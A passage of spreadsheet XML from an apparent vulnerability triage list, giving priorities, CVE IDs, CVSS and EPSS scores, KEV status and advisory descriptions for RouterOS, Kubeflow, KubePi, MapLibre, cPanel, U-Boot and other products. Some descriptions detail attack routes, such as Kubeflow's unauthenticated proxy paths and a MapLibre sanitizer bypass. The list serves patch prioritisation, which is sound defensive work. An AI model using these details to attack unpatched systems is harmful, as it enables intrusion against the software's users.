      </c>
      <c r="I16" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D17" s="5" t="inlineStr"/>
      <c r="E17" s="5" t="inlineStr"/>
      <c r="F17" s="5" t="inlineStr"/>
      <c r="G17" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr"/>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54745</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-918</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>Kubeflow Pipelines enables users to build and deploy portable, scalable machine learning workflows. Prior to 2.17.0, the Kubeflow Pipelines frontend exposes an unauthenticated server-side request forgery vulnerability through the /_proxy/ route in frontend/server/proxy-middleware.ts. The _routePathWithReferer() function accepts an arbitrary attacker-controlled HTTP or HTTPS target and passes its origin to createProxyMiddleware without a host allowlist or filtering for loopback, link-local, RFC1918, or cluster-local addresses. The route remains outside the authorization middleware when ENABLE_AUTHZ=true and is reachable through /apis/v1beta1/_proxy/, /apis/v2beta1/_proxy/, /pipeline/apis/v1beta1/_proxy/, and /pipeline/apis/v2beta1/_proxy/, including through a crafted Referer header. Requests can forward attacker-controlled methods, headers such as Authorization, Cookie, and X-Forwarded-For, and POST bodies to reachable internal services, while returning the upstream response to the unauthenticated client. This can expose cloud metadata credentials, Kubernetes or service APIs, and other cluster-internal endpoints to unauthorized read or modification. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54745</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65956</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 1.6.15, the SSO configuration API endpoints are exposed on the same public routing boundary as the SSO login and callback endpoints, so SSO, OIDC, and SAML management operations can be reached without administrator authorization. Because reading, creating, and updating the global SSO configuration is not restricted to administrators, an unauthorized or low-privileged user can inspect or alter the authentication configuration, which under certain conditions can lead to account takeover or privilege escalation. The SSO connectivity-test function can additionally be abused as a server-side request forgery primitive, and the user list API returns user objects without consistently clearing authentication-related fields. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65956</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79696</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>A Code Injection vulnerability in adk web in Google Cloud Agent Development Kit (ADK) for Python versions 2.0.0 through 2.6.0 on Python (OSS), Cloud Run, and GKE environments where pytest is installed allows an unauthenticated remote attacker to execute arbitrary code using a crafted test session replay.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79696</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85061</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>MapLibre GL JS is an interactive vector tile map library for web browsers. Prior to 6.4.1, DOM.sanitize() in src/util/dom.ts iterates elem.attributes as a live NamedNodeMap while removeAttributes() removes attributes from the same collection, shifting indexes and skipping an adjacent dangerous attribute. An attacker who controls untrusted third-party style attribution strings or user-supplied custom attributions can supply consecutive dangerous attributes, causing an attribute such as onload or ontoggle to survive sanitization and execute when the attribution control inserts the content into innerHTML. A victim must render the affected map content for the script to execute. This issue is fixed in version 6.4.1.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85978</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security@puppet.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-41, CWE-863, CWE-94</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote code execution vulnerability exists in the Policy Manager console of Akana API Platform. A path normalization discrepancy between the authentication filter and the servlet dispatcher allows a crafted request to bypass authentication and reach an endpoint that evaluates attacker-supplied script code without sandboxing, resulting in arbitrary code execution. Exploitation requires no authentication or user interaction.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85978</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87827</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>Certain KGUARD DVR devices running vulnerable firmware expose a system command execution service on all network interfaces without requiring authentication. A remote unauthenticated attacker with network access to the affected service can execute arbitrary system commands on the device, potentially resulting in complete compromise of the DVR.
The vulnerability is known to have been exploited in the wild by the Mirai_ptea (Rimasuta) and Mirai_aurora botnets for malware propagation and subsequent DDoS activity. The vulnerability was reported to affect firmware dating from 2016, while firmware released after 2017 appears to mitigate the issue by restricting the affected service to the localhost interface (127.0.0.1) instead of exposing it on all interfaces (0.0.0.0).
The affected-device list reported by Netlab includes many D1004NR, D1008NR, D1016NR, D1104, D1104NR, D1108NR, D1116NR, D1132NR, D2116NR, D97xx, D98xx, and D99xx variants and several associated hardware revisions
The exploit is included in some version of rapperbot and exploited in 2026. This assignment has been made to document the active exploitation and lack of documentation from the vendor.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87827</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55634</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-89, CWE-94</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, the class-definition import endpoint /pimcore-studio/api/class/definition/configuration-view/detail/{id}/import accepts a DataObject field name that is emitted without an identifier allowlist by lib/DataObject/ClassBuilder/FieldDefinitionPropertiesBuilder.php into generated PHP properties and by models/DataObject/ClassDefinition/Helper/Dao.php into ALTER TABLE identifiers. An authenticated user with the objects permission can inject PHP syntax into the generated DataObject class, causing attacker-controlled code in generated var/classes/DataObject/.php files to run when an object of that class is instantiated, and can also inject SQL identifier content into schema-changing statements. The central models/DataObject/ClassDefinition/Data.php::setName() validation did not reject semicolons, braces, backticks, spaces, or other non-identifier characters. This issue is fixed in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55634</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62283</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&amp;M tool. Nezha versions 1.14.13 through 1.14.14 and 2.0.0 through 2.0.9 do not bind stream identifiers created by CreateStream in service/rpc/io_stream.go to their creating user, and `GET /ws/terminal/:id` and `GET /ws/file/:id` only check whether the supplied UUID exists. An authenticated RoleMember who obtains a live stream UUID from logs, browser history, referer data, or telemetry can attach to another user's terminal or file-manager session, read and write target-server files, and execute shell commands. This issue is fixed in version 2.0.10.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62283</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67401</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in cPanel allows a mail-enabled account to achieve remote code execution as root through SQLi in EmailTrack component</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67401</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-67066</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in oasys sysoa version 1.0 allows a remote attacker to execute arbitrary code via the outtype parameter in the /outaddresspaging path</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-67066</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70290</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Denx U-Boot before 2026.04. An integer overflow vulnerability in the ZFS filesystem support can be triggered by malformed on-disk metadata. The issue may result in incorrect memory allocation followed by out-of-bounds memory access, potentially leading to a crash or arbitrary code execution during the boot process.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70290</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70293</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Denx U-Boot before 2026.04. An integer overflow vulnerability exists in function ext4fs_get_bgdtable, the size calculation can lead to under allocation and this underallocated buffer will be used in memcpy() which could lead to arbitrary code execution, a denial of service, or other unspecified impacts.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70293</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21095</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in DNG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21095</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21096</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in JPEG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21096</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-36433</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
